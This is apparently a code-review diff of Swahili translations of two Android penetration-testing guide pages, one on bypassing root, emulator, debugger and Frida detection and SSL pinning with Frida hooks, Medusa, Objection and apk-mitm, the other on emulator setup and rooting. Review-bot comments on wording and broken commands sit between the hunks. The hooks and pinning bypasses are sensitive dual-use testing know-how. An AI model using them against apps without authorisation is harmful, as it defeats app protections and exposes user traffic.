- Codeshare: https://codeshare.frida.re/
## Otomatisha na Medusa (Frida framework)
## Otomatisha kwa Medusa (Frida framework)
Medusa inatoa moduli 90+ tayari kwa ajili ya SSL unpinning, root/emulator detection bypass, HTTP comms logging, crypto key interception, na zaidi.
Medusa inatoa 90+ modules zilizo tayari kwa ajili ya SSL unpinning, root/emulator detection bypass, HTTP comms logging, crypto key interception, na mengine mengi.
```bash
git clone https://github.com/Ch0pin/medusa
cd medusa
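Review bot: the new line "Hizi kwa kawaida stub Java root/debug checks, ..." drops the verb the old line had ("huwa stub"), leaving the sentence without a predicate; write "Hizi kwa kawaida hu-stub Java root/debug checks ..." or keep "huwa stub".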
@ -54,22 +54,22 @@ use http_communications/multiple_unpinner
use root_detection/universal_root_detection_bypass
run com.target.app
```
Vidokezo: Medusa ni nzuri kwa kupata faida za haraka kabla ya kuandika custom hooks. Unaweza pia cherry-pick modules na kuzichanganya na scripts zako.
Vidokezo: Medusa ni nzuri kwa kupata ushindi wa haraka kabla ya kuandika hooks maalum. Unaweza pia kuchagua modules kwa makini na kuzichanganya na scripts zako.
## Hatua 3 — Bypass init-time detectors by attaching late
## Hatua ya 3 — Pita kando detekta za wakati wa kuanzisha kwa kuambatisha baadaye
Ugunduzi mwingi hufanyika tu wakati wa process spawn/onCreate(). Spawntime injection (-f) au gadgets hugunduliwa; kuambatisha baada UI inapopakia kunaweza kupita bila kugunduliwa.
Deteksheni nyingi hufanya kazi tu wakati wa process spawn/onCreate(). Spawntime injection (-f) au gadgets hukamatwa; kuambatisha baada ya UI kupakia kunaweza kupita bila kugunduliwa.
```bash
# Launch the app normally (launcher/adb), wait for UI, then attach
frida -U -n com.example.app
# Or with Objection to attach to running process
aobjection --gadget com.example.app explore # if using gadget
```
Ikiwa hili litafanya kazi, weka session kuwa thabiti na endelea na map and stub checks.
Ikiwa hili litafanya kazi, hakikisha kikao kinabaki thabiti na endelea na kazi za kuunda ramani na ukaguzi wa stub.
## Hatua 4 — Ramani mantiki ya utambuzi kupitia Jadx na string hunting
## Hatua 4 — Ramani mantiki ya utambuzi kupitia Jadx na utafutaji wa strings
Static triage keywords in Jadx:
Maneno muhimu ya static triage katika Jadx:
- "frida", "gum", "root", "magisk", "ptrace", "su", "getprop", "debugger"
Mifano ya kawaida ya Java:
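Review bot: the context line `aobjection --gadget com.example.app explore` has a typo in the command name (the tool is `objection`) and fails as written; since this hunk edits the prose around the block, fix it in the same change. In the new heading "Ramani mantiki ya utambuzi kupitia Jadx na utafutaji wa strings" the verb is missing: "Chora ramani ya mantiki ya utambuzi ..." (or "Ramanisha mantiki ...") matches the imperative style of the other step headings.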
@ -78,16 +78,16 @@ public boolean isFridaDetected() {
return getRunningServices().contains("frida");
}
```
APIs za kawaida za kukagua/hook:
API za kawaida za kukagua/hook:
- android.os.Debug.isDebuggerConnected
- android.app.ActivityManager.getRunningAppProcesses / getRunningServices
- java.lang.System.loadLibrary / System.load (native bridge)
- java.lang.Runtime.exec / ProcessBuilder (probing commands)
- android.os.SystemProperties.get (root/emulator heuristics)
- java.lang.Runtime.exec / ProcessBuilder (maamri ya kuchunguza)
- android.os.SystemProperties.get (heuristics za root/emulator)
## Hatua 5 — Uundaji wa stub wakati wa runtime na Frida (Java)
## Hatua ya 5 — Runtime stubbing na Frida (Java)
Badilisha vidhibiti maalum ili kurudisha thamani salama bila repacking:
Override custom guards ili zirudishe thamani salama bila repacking:
```js
Java.perform(() => {
const Checks = Java.use('com.example.security.Checks');
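Review bot: "maamri ya kuchunguza" in the new Runtime.exec/ProcessBuilder bullet is not standard Swahili; "amri" is both singular and plural, so "amri za kuchunguza". The new line "Override custom guards ili zirudishe thamani salama bila repacking" also leaves the first half in English, while the old "Badilisha vidhibiti maalum ili kurudisha thamani salama bila repacking" was fully translated and can stay.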
@ -102,7 +102,7 @@ const AM = Java.use('android.app.ActivityManager');
AM.getRunningAppProcesses.implementation = function () { return java.util.Collections.emptyList(); };
});
```
Unapochambua crashes mapema? Dump classes tu kabla inavyokufa ili kugundua namespaces zinazoweza kuwa za utambuzi:
Triaging early crashes? Dump classes tu kabla inavyokufa ili kutambua detection namespaces zinazowezekana:
```js
Java.perform(() => {
Java.enumerateLoadedClasses({
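Review bot: the context line `AM.getRunningAppProcesses.implementation = function () { return java.util.Collections.emptyList(); };` throws a ReferenceError inside a Frida script, because `java` is not a JavaScript global there; the list has to come through the bridge, e.g. `return Java.use('java.util.Collections').emptyList();` (or `Java.use('java.util.ArrayList').$new()`). Worth fixing while the neighbouring prose line is being rewritten, otherwise the example crashes the hook on first call.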
@ -119,7 +119,7 @@ RootChecker.isDeviceRooted.implementation = function () { return false; };
} catch (e) {}
});
Log na fanya methods zinazoshukiwa zisifanye kazi ili kuthibitisha mtiririko wa utekelezaji:
Rekodi na kuzima mbinu zinazoshukiwa ili kuthibitisha mtiririko wa utekelezaji:
```js
Java.perform(() => {
const Det = Java.use('com.example.security.DetectionManager');
@ -131,7 +131,7 @@ return false;
```
## Bypass emulator/VM detection (Java stubs)
Kanuni za kawaida: Build.FINGERPRINT/MODEL/MANUFACTURER/HARDWARE zikiwa na generic/goldfish/ranchu/sdk; alama za QEMU kama /dev/qemu_pipe, /dev/socket/qemud; MAC ya default 02:00:00:00:00:00; 10.0.2.x NAT; ukosefu wa telephony/sensors.
Vidokezo vya kawaida: Build.FINGERPRINT/MODEL/MANUFACTURER/HARDWARE zikiwa zinajumuisha generic/goldfish/ranchu/sdk; QEMU artifacts kama /dev/qemu_pipe, /dev/socket/qemud; default MAC 02:00:00:00:00:00; 10.0.2.x NAT; kukosekana kwa telephony/sensors.
Spoof ya haraka ya Build fields:
```js
@ -143,11 +143,11 @@ Build.BRAND.value = 'google';
Build.FINGERPRINT.value = 'google/panther/panther:14/UP1A.231105.003/1234567:user/release-keys';
});
```
Ongeza stubs kwa ukaguzi wa kuwepo kwa faili na vitambulisho (TelephonyManager.getDeviceId/SubscriberId, WifiInfo.getMacAddress, SensorManager.getSensorList) ili kurudisha thamani za kweli.
Ongeza stubs kwa ukaguzi wa kuwepo kwa faili na vitambulisho (TelephonyManager.getDeviceId/SubscriberId, WifiInfo.getMacAddress, SensorManager.getSensorList) ili zirudishe thamani za kweli.
## SSL pinning bypass quick hook (Java)
Tawanya TrustManagers maalum na kulazimisha SSL contexts zinazoruhusu:
Batilisha TrustManagers maalum na kulazimisha SSL contexts zinazoruhusu:
```js
Java.perform(function(){
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
@ -166,16 +166,16 @@ return SSLContextInit.call(this, km, TrustManagers, sr);
});
```
Vidokezo
- Panua kwa OkHttp: hook okhttp3.CertificatePinner na HostnameVerifier kama inahitajika, au tumia script ya unpinning kutoka CodeShare.
- Panua kwa OkHttp: hook okhttp3.CertificatePinner na HostnameVerifier kama inavyohitajika, au tumia universal unpinning script kutoka CodeShare.
- Mfano wa kuendesha: `frida -U -f com.target.app -l ssl-bypass.js --no-pause`
## Hatua 6 — Fuata mnyororo wa JNI/native wakati Java hooks zinaposhindwa
## Hatua 6 — Fuata njia ya JNI/native wakati Java hooks zinashindwa
Fuata entry points za JNI ili kubaini native loaders na detection init:
Fuatilia JNI entry points ili kupata native loaders na detection init:
```bash
frida-trace -n com.example.app -i "JNI_OnLoad"
```
Tathmini ya haraka ya native ya faili za .so zilizojumuishwa:
Tathmini ya haraka ya native ya mafaili .so yaliyoambatanishwa:
```bash
# List exported symbols & JNI
nm -D libfoo.so | head
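Review bot: the run example in the notes, `frida -U -f com.target.app -l ssl-bypass.js --no-pause`, spawns the app, which is exactly what Step 3 of this page says init-time checks catch; the note should say that for hardened targets the script is loaded after attaching (`frida -U -n com.target.app -l ssl-bypass.js`). Separately, on recent Frida (16 and later) a spawned process resumes automatically and `--no-pause` is no longer accepted (the opposite behaviour is selected with `--pause`), so the flag should be dropped or the command version-qualified; verify against the Frida version in use.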
@ -186,7 +186,7 @@ Interactive/native reversing:
- Ghidra: https://ghidra-sre.org/
- r2frida: https://github.com/nowsecure/r2frida
Mfano: kuondoa ptrace ili kuishinda antidebug rahisi katika libc:
Mfano: kufanya ptrace isitumike ili kushinda antidebug rahisi katika libc:
```js
const ptrace = Module.findExportByName(null, 'ptrace');
if (ptrace) {
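Review bot: the ptrace stub relies on `Module.findExportByName(null, 'ptrace')`; on Frida 17 and later the two-argument global lookup with `null` was removed in favour of `Module.findGlobalExportByName('ptrace')`, so the example only runs on older Frida. Either update the call or have the prose line "Mfano: kufanya ptrace isitumike ..." say which Frida version it targets.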
@ -202,28 +202,28 @@ reversing-native-libraries.md
## Hatua 7 — Objection patching (embed gadget / strip basics)
Ikiwa unapendelea repacking kuliko runtime hooks, jaribu:
Ikiwa unapendelea repacking badala ya runtime hooks, jaribu:
```bash
objection patchapk --source app.apk
```
Vidokezo:
- Inahitaji apktool; hakikisha toleo la sasa kutoka kwenye mwongozo rasmi ili kuepuka matatizo ya ujenzi: https://apktool.org/docs/install
- Gadget injection inaruhusu instrumentation bila root lakini bado inaweza kugunduliwa na stronger inittime checks.
- Requires apktool; ensure a current version from the official guide to avoid build issues: https://apktool.org/docs/install
- Gadget injection enables instrumentation without root but can still be caught by stronger inittime checks.
Hiari, ongeza LSPosed modules na Shamiko kwa stronger root hiding katika mazingira ya Zygisk, na andaa DenyList ili kufunika child processes.
Hiari, ongezea moduli za LSPosed na Shamiko kwa stronger root hiding katika Zygisk environments, na panga DenyList ili kufunika child processes.
Marejeleo:
Marejeo:
- Objection: https://github.com/sensepost/objection
## Hatua 8 — Njia mbadala: Rekebisha TLS pinning kwa muonekano wa mtandao
## Hatua 8 — Mbadala: Rekebisha TLS pinning kwa uwazi wa mtandao
Ikiwa instrumentation imezuiwa, bado unaweza kuchunguza trafiki kwa kuondoa pinning kwa njia ya static:
Ikiwa instrumentation imezuiwa, bado unaweza kuchunguza trafiki kwa kuondoa TLS pinning kwa njia ya statiki:
```bash
apk-mitm app.apk
# Then install the patched APK and proxy via Burp/mitmproxy
```
- Zana: https://github.com/shroudedcode/apk-mitm
- Kwa ujanja wa CAtrust katika usanidi wa mtandao (na user CA trust ya Android 7+), angalia:
- Kwa mbinu za CAtrust katika usanidi wa network (na user CA trust ya Android 7+), angalia:
{{#ref}}
make-apk-accept-ca-certificate.md
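Review bot: the two Objection notes are reverted to English ("Requires apktool; ensure a current version ..." and "Gadget injection enables instrumentation without root ...") while the old Swahili lines they replace were already correct; keep the Swahili versions. The "Marejeleo" to "Marejeo" spelling change is fine.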
@ -233,7 +233,7 @@ make-apk-accept-ca-certificate.md
install-burp-certificate.md
{{#endref}}
## Mwongozo mfupi wa amri muhimu
## Orodha fupi ya amri muhimu
```bash
# List processes and attach
frida-ps -Uai
@ -253,10 +253,10 @@ apk-mitm app.apk
```
## Vidokezo na tahadhari
- Pendelea attaching baadaye badala ya spawning wakati apps zinapo-crash wakati wa launch
- Baadhi ya detections zinafanyika tena katika critical flows (e.g., payment, auth) — keep hooks active during navigation
- Changanya static na dynamic: string hunt katika Jadx ili kupunguza classes kwenye shortlist; kisha hook methods ili kuthibitisha wakati wa runtime
- Hardened apps zinaweza kutumia packers na native TLS pinning — tarajia ku-reverse native code
- Pendelea ku-attach mwishowe kuliko spawning wakati apps zinaporomoka wakati wa uzinduzi
- Baadhi ya utambuzi zinafanywa tena katika mizunguko muhimu (mf., payment, auth) — weka hooks zikiwa active wakati wa navigation
- Changanya static na dynamic: string hunt katika Jadx ili kupunguza orodha ya classes; kisha hook methods ili kuthibitisha wakati wa runtime
- Apps zilizo hardened zinaweza kutumia packers na native TLS pinning — tarajia ku-reverse native code
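Review bot: "Pendelea ku-attach mwishowe kuliko spawning" changes the meaning from the old "attaching baadaye" (attach later, once the UI is up) to "attach at the very end", and "zinaporomoka" (collapse) is an odd rendering of crash where the old "zinapo-crash" matches the term used elsewhere on the page; keep "baadaye" and "zinapo-crash" in that bullet.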
## References

View File

@ -2,23 +2,23 @@
{{#include ../../banners/hacktricks-training.md}}
Asante sana kwa [**@offsecjay**](https://twitter.com/offsecjay) kwa msaada wake wakati wa kuunda yaliyomo haya.
Asante sana kwa [**@offsecjay**](https://twitter.com/offsecjay) kwa msaada wake wakati wa kuunda maudhui haya.
## Nini
Android Studio inaruhusu **kuendesha mashine pepe za Android ambazo unaweza kuzitumia kujaribu APKs**. Ili kuzitumia utahitaji:
Android Studio inaruhusu **kuendesha mashine pepe za Android ambazo unaweza kutumia kujaribu APKs**. Ili kuvitumia utahitaji:
- The **Android SDK tools** - [Download here](https://developer.android.com/studio/releases/sdk-tools).
- Au **Android Studio** (with Android SDK tools) - [Download here](https://developer.android.com/studio).
- Or **Android Studio** (with Android SDK tools) - [Download here](https://developer.android.com/studio).
Katika Windows (kwangu) **baada ya kusakinisha Android Studio** nilikuwa na **SDK Tools zimesakinishwa katika**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
Katika Windows (kwangu) **baada ya kusakinisha Android Studio** nilipata **SDK Tools zimesakinishwa katika**: `C:\Users\<UserName>\AppData\Local\Android\Sdk\tools`
Kwenye mac unaweza **download the SDK tools** na kuwa nazo kwenye PATH kwa kukimbia:
Katika mac unaweza **kupakua SDK tools** na kuwa nazo kwenye PATH kwa kukimbia:
```bash
brew tap homebrew/cask
brew install --cask android-sdk
```
Au kutoka kwa **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itaweka hizo katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Au kutoka kwa **Android Studio GUI** kama ilivyoonyeshwa katika [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) ambayo itawasakinisha katika `~/Library/Android/sdk/cmdline-tools/latest/bin/` na `~/Library/Android/sdk/platform-tools/` na `~/Library/Android/sdk/emulator/`
Kwa matatizo ya Java:
```java
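Review bot: the new bullet "Or **Android Studio** (with Android SDK tools)" reverts the Swahili "Au" to English; keep "Au". Also, the fence opening at the end of the hunk is tagged `java` but the block contains a shell `export JAVA_HOME=...` line, so the tag should be `bash`.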
@ -26,7 +26,7 @@ export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
```
## GUI
### Andaa Virtual Machine
### Andaa Mashine ya Virtual
Ikiwa umeweka Android Studio, unaweza kufungua tu muonekano mkuu wa mradi na kufikia: _**Tools**_ --> _**AVD Manager.**_
@ -47,25 +47,25 @@ _**chagua** simu unayotaka kutumia_ na bonyeza _**Next.**_
>
> <img src="../../images/image (1144).png" alt="" data-size="original">
Katika muonekano wa sasa utaweza **kuchagua na kupakua Android image** ambayo simu itaendesha:
Katika muonekano wa sasa utaweza **kuchagua na kupakua image ya Android** ambayo simu itakayotumia itakimbia:
<figure><img src="../../images/image (1145).png" alt="" width="375"><figcaption></figcaption></figure>
Hivyo, chagua hiyo na kama haijapakuliwa bonyeza alama ya _**Download**_ kando ya jina (**sasa subiri hadi image inapakuliwa).**\
Mara image inapopakuliwa, chagua tu **`Next`** na **`Finish`**.
Hivyo, chagua na ikiwa haijapakuliwa bonyeza alama ya _**Download**_ kando ya jina (**now wait until the image is downloaded).**\
Mara image itakapopakuliwa, chagua **`Next`** na **`Finish`**.
Mashine pepe itaundwa. Sasa **kila mara unapoingia AVD Manager itakuwa pale**.
Mashine ya virtual itaumbwa. Sasa **kila wakati utakapoingia AVD manager itakuwa present**.
### Endesha Virtual Machine
### Endesha Mashine ya Virtual
Ili **kuendesha** bonyeza tu _**Start button**_.
Ili ku**endesha** bonyeza tu _**Start button**_.
![](<../../images/image (518).png>)
## Zana ya Command Line
> [!WARNING]
> Kwa macOS unaweza kupata chombo `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa umeziweka.
> Kwa macOS unaweza kupata zana ya `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` kama zimewekwa.
Kwanza kabisa unahitaji **kuamua ni simu gani unayotaka kutumia**, ili kuona orodha ya simu zinazowezekana endesha:
```
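Review bot: the new line "Hivyo, chagua na ikiwa haijapakuliwa bonyeza alama ya _**Download**_ kando ya jina (**now wait until the image is downloaded).**" leaves the parenthetical untranslated where the old line had "sasa subiri hadi image inapakuliwa"; keep the Swahili. The hunk also switches "Mashine pepe"/"Virtual Machine" to "Mashine ya virtual" in the headings and in "Mashine ya virtual itaumbwa", while the rest of the page says "mashine pepe"; pick one term.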
@ -95,7 +95,7 @@ Name: Nexus 10
OEM : Google
[...]
```
Mara tu unapochagua jina la kifaa unayotaka kutumia, unahitaji **kuamua ni Android image gani unayotaka kuendesha kwenye kifaa hiki.**\
Mara tu umeamua jina la kifaa unalotaka kutumia, unahitaji **kuamua ni Android image gani unayotaka kuendesha kwenye kifaa hiki.**\
Unaweza kuorodhesha chaguzi zote ukitumia `sdkmanager`:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
@ -104,7 +104,7 @@ Na **pakua** ile (au zote) unayotaka kutumia na:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat "platforms;android-28" "system-images;android-28;google_apis;x86_64"
```
Mara baada ya kupakua image ya Android unayotaka kutumia, unaweza **kuorodhesha picha zote za Android ulizopakua** kwa:
Mara baada ya kupakua image ya Android unayotaka kutumia, unaweza **kuorodhesha picha zote za Android zilizopakuliwa** kwa:
```
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list target
----------
@ -120,11 +120,11 @@ Type: Platform
API level: 29
Revision: 4
```
Kwa wakati huu umeamua kifaa unachotaka kutumia na umepakua picha ya Android, hivyo **unaweza kuunda mashine pepe ukitumia**:
Wakati huu umeamua kifaa unachotaka kutumia na umepakua imaji ya Android, hivyo **unaweza kuunda mashine pepe kwa kutumia**:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
```
Katika amri iliyopita **nilitengeneza VM iliyoitwa** "_AVD9_" kwa kutumia **kifaa** "_Nexus 5X_" na **Android image** "_system-images;android-28;google_apis;x86_64_".\
Katika amri ya mwisho **nilitengeneza VM iliyoitwa** "_AVD9_" kwa kutumia **kifaa** "_Nexus 5X_" na **Android image** "_system-images;android-28;google_apis;x86_64_".\
Sasa unaweza **kuorodhesha virtual machines** ulizozitengeneza kwa:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
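Review bot: "imaji ya Android" in the new line "Wakati huu umeamua kifaa unachotaka kutumia ..." introduces a third spelling next to "image" and "picha" used in the surrounding lines; keep "image", which is what the rest of the page and the `sdkmanager` output use.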
@ -140,55 +140,55 @@ Name: Pixel_2_API_27
Path: C:\Users\cpolo\.android\avd\Pixel_2_API_27_1.avd
Error: Google pixel_2 no longer exists as a device
```
### Endesha Virtual Machine
### Endesha Mashine ya Virtual
> [!WARNING]
> Kwa macOS unaweza kupata zana `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa umeisakinisha.
> Kwa macOS unaweza kupata zana ya `avdmanager` katika `/Users/<username>/Library/Android/sdk/tools/bin/avdmanager` na `emulator` katika `/Users/<username>/Library/Android/sdk/emulator/emulator` ikiwa zimewekwa.
Tayari tumeona jinsi unavyoweza kuorodhesha virtual machines zilizoundwa, lakini **pia unaweza kuorodhesha kwa kutumia**:
Tayari tumeona jinsi unavyoweza kuorodhesha mashine za virtual ulizozitengeneza, lakini **unaweza pia kuorodhesha kwa kutumia**:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
AVD9
Pixel_2_API_27
```
Unaweza kwa urahisi **kuendesha virtual machine yoyote uliyotengeneza** ukitumia:
Unaweza kwa urahisi **kuendesha mashine pepe yoyote iliyoundwa** ukitumia:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "VirtualMachineName"
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9"
```
Au kwa kutumia chaguo zilizoendelea zaidi unaweza kuendesha mashine pepe kama:
Au kwa kutumia chaguo za juu zaidi, unaweza kuendesha virtual machine kama:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
```
### Chaguzi za mstari wa amri
### Chaguo za mstari wa amri
Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo unaweza kutumia kuanzisha mashine pepe. Hapa chini unaweza kupata baadhi ya chaguzi za kuvutia lakini unaweza [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
Hata hivyo kuna **chaguzi nyingi tofauti za mstari wa amri zinazofaa** ambazo unaweza kutumia kuanzisha mashine pepe. Hapa chini unaweza kupata baadhi ya chaguzi zenye kuvutia lakini unaweza [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
**Uanzishaji**
**Boot**
- `-snapshot name` : Anzisha snapshot ya VM
- `-snapshot-list -snapstorage ~/.android/avd/Nexus_5X_API_23.avd/snapshots-test.img` : Orodhesha snapshots zote zilizorekodiwa
**Mtandao**
**Network**
- `-dns-server 192.0.2.0, 192.0.2.255` : Inaruhusu kuonyesha servers za DNS tofauti zilizotenganishwa kwa koma kwa VM.
- **`-http-proxy 192.168.1.12:8080`** : Inaruhusu kuweka HTTP proxy ya kutumia (inayofaa sana kwa kunasa trafiki kwa kutumia Burp)
- `-dns-server 192.0.2.0, 192.0.2.255` : Inaruhusu kuainisha kwa koma seva za DNS kwa VM.
- **`-http-proxy 192.168.1.12:8080`** : Inaruhusu kuainisha HTTP proxy ya kutumia (muhimu sana kwa kunasa trafiki kwa kutumia Burp)
- If the proxy settings aren't working for some reason, try to configure them internally or using an pplication like "Super Proxy" or "ProxyDroid".
- `-netdelay 200` : Weka uigaji wa ucheleweshaji wa mtandao kwa millisekunde.
- `-netdelay 200` : Weka emulation ya ucheleweshaji wa mtandao kwa millisekunde.
- `-port 5556` : Weka nambari ya port ya TCP inayotumika kwa console na adb.
- `-ports 5556,5559` : Weka ports za TCP zinazotumika kwa console na adb.
- **`-tcpdump /path/dumpfile.cap`** : Inakamata trafiki yote kwenye faili
- `-ports 5556,5559` : Weka port za TCP zinazotumika kwa console na adb.
- **`-tcpdump /path/dumpfile.cap`** : Inakamata trafiki yote katika faili
**Mfumo**
**System**
- `-selinux {disabled|permissive}` : Weka module ya usalama Security-Enhanced Linux katika mode imezimwa au permissive kwenye mfumo wa uendeshaji Linux.
- `-selinux {disabled|permissive}` : Weka moduli ya usalama ya Security-Enhanced Linux kuwa disabled au permissive kwenye mfumo wa uendeshaji wa Linux.
- `-timezone Europe/Paris` : Weka timezone kwa kifaa pepe
- `-screen {touch(default)|multi-touch|o-touch}` : Weka mode ya skrini ya kugusa inayoiga.
- **`-writable-system`** : Tumia chaguo hili kupata image ya mfumo inayoweza kuandikwa wakati wa kikao chako cha emulation. Pia utahitaji kukimbia `adb root; adb remount`. Hili ni muhimu sana kwa kufunga cheti jipya kwenye mfumo.
- `-screen {touch(default)|multi-touch|o-touch}` : Weka mode ya skrini ya kugusa iliyohamirishwa.
- **`-writable-system`** : Tumia chaguo hili ili kuwa na system image inayoweza kuandikwa wakati wa kipindi chako cha emulation. Pia utahitaji kuendesha `adb root; adb remount`. Hili ni muhimu sana kusakinisha cheti jipya kwenye mfumo.
## Usanidi wa CLI ya Linux (SDK/AVD quickstart)
Vifaa rasmi vya CLI vinafanya iwe rahisi kuunda emulators za haraka na zinazoweza kudebugiwa bila Android Studio.
Zana rasmi za CLI zinafanya iwe rahisi kuunda emulators za haraka, zinazoweza kufanyiwa debug bila Android Studio.
```bash
# Directory layout
mkdir -p ~/Android/cmdline-tools/latest
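Review bot: the option values in the command-line list carry a typo that the retranslation preserved: `-screen {touch(default)|multi-touch|o-touch}` on L2454/L2456 should read `no-touch`, which is the mode name the emulator accepts. Likewise `-dns-server 192.0.2.0, 192.0.2.255` on L2437/L2439 has a space after the comma, so the shell splits it into two arguments; the list must be written `192.0.2.0,192.0.2.255`. On the translation side, the subheadings 'Boot', 'Network' and 'System' (L2432, L2436, L2450) revert the previous Swahili labels (L2431, L2435, L2449) to English, and the unchanged context line L2441 still reads 'an pplication' for 'an application'.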
@ -217,11 +217,11 @@ adb root
adb shell whoami # expect: root
```
Vidokezo
- Aina za system image: google_apis (inaweza kudebugiwa, inaruhusu adb root), google_apis_playstore (haiwezi ku-root), aosp/default (nyepesi).
- Aina za build: userdebug mara nyingi huruhusu `adb root` kwenye image zilizo na uwezo wa kudebug. Play Store images ni production builds na huzuia root.
- Kwenye hosts za x86_64, emulation kamili ya ARM64 haitegemelewi kuanzia API 28+. Kwa Android 11+ tumia Google APIs/Play images zinazojumuisha tafsiri ya ARM-to-x86 kwa kila-app ili kuendesha kwa haraka apps nyingi za ARM pekee.
- System image flavors: google_apis (debuggable, inaruhusu `adb root`), google_apis_playstore (not rootable), aosp/default (lightweight).
- Build types: userdebug mara nyingi inaruhusu `adb root` kwenye images zenye debug-capability. Play Store images ni production builds na huzuia root.
- On x86_64 hosts, full-system ARM64 emulation is unsupported from API 28+. For Android 11+ tumia Google APIs/Play images ambazo zinajumuisha per-app ARM-to-x86 translation ili kuendesha apps nyingi za ARM-only kwa haraka.
### Snapshots from CLI
### Snapshots kutoka kwa CLI
```bash
# Save a clean snapshot from the running emulator
adb -s emulator-5554 emu avd snapshot save my_clean_setup
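Review bot: the retranslated notes at L2471 to L2473 are half English ('System image flavors: google_apis (debuggable, inaruhusu `adb root`)', 'On x86_64 hosts, full-system ARM64 emulation is unsupported from API 28+') where the previous lines L2468 to L2470 were fully Swahili; this is a regression rather than a cleanup. The content itself is right that Play Store images are production builds on which `adbd` refuses root. The snapshot command `adb -s emulator-5554 emu avd snapshot save my_clean_setup` on L2478 assumes the default console port 5554, which is worth stating since the option list above shows `-port`/`-ports` overriding it.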
@ -229,39 +229,39 @@ adb -s emulator-5554 emu avd snapshot save my_clean_setup
# Boot from a named snapshot (if it exists)
emulator -avd PixelRootX86 -writable-system -snapshot my_clean_setup
```
## Tafsiri ya binary ya ARM→x86 (Android 11+)
## ARM→x86 binary translation (Android 11+)
Google APIs na Play Store images kwenye Android 11+ zinaweza kutafsiri binaries za app za ARM kwa kila process huku zikihifadhi sehemu nyingine za mfumo kuwa native x86/x86_64. Hii mara nyingi ni ya kutosha kujaribu apps nyingi za ARM-tu kwenye desktop.
Google APIs na Play Store images kwenye Android 11+ zinaweza kutafsiri binaries za app za ARM kwa kila mchakato huku zikihifadhi sehemu nyingine za mfumo kuwa native x86/x86_64. Hii mara nyingi ni ya kutosha kwa kasi kujaribu apps nyingi zinazotegemea ARM tu kwenye desktop.
Kidokezo: Tumia Google APIs x86/x86_64 images wakati wa pentests. Play images ni rahisi lakini zinazuia `adb root`; zitumie tu unapohitaji Play services na ukubali kukosa root.
> Kidokezo: Pendelea Google APIs x86/x86_64 images wakati wa pentests. Play images ni rahisi lakini huzuia `adb root`; zitumie tu unapohitaji Play services kwa mahsusi na ukikubali ukosefu wa root.
## Rooting kifaa cha Play Store
## Rooting a Play Store device
Ikiwa umepakua kifaa chenye Play Store hautaweza kupata root moja kwa moja, na utapata ujumbe huu wa kosa
Ikiwa umepakua kifaa chenye Play Store hutaweza kupata root moja kwa moja, na utapata ujumbe huu wa kosa
```
$ adb root
adbd cannot run as root in production builds
```
Nikitumia [rootAVD](https://github.com/newbit1/rootAVD) pamoja na [Magisk](https://github.com/topjohnwu/Magisk) niliweza ku-root (fuata kwa mfano [**this video**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**this one**](https://www.youtube.com/watch?v=qQicUW0svB8)).
Kwa kutumia [rootAVD](https://github.com/newbit1/rootAVD) pamoja na [Magisk](https://github.com/topjohnwu/Magisk) niliweza kui-root (fuata kwa mfano [**video hii**](https://www.youtube.com/watch?v=Wk0ixxmkzAI) **au** [**hii nyingine**](https://www.youtube.com/watch?v=qQicUW0svB8)).
## Install Burp Certificate
## Sakinisha Cheti cha Burp
Angalia ukurasa ufuatao kujifunza jinsi ya kusakinisha cheti maalum cha CA:
Angalia ukurasa ufuatao ili kujifunza jinsi ya kusakinisha cheti maalum cha CA:
{{#ref}}
install-burp-certificate.md
{{#endref}}
## Nice AVD Options
## Chaguzi Nzuri za AVD
### Take a Snapshot
### Chukua Snapshot
Unaweza **kutumia GUI** kuchukua snapshot ya VM wakati wowote:
![](<../../images/image (234).png>)
## References
## Marejeo
- [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools)
- [Android Emulator command line](https://developer.android.com/studio/run/emulator-commandline)
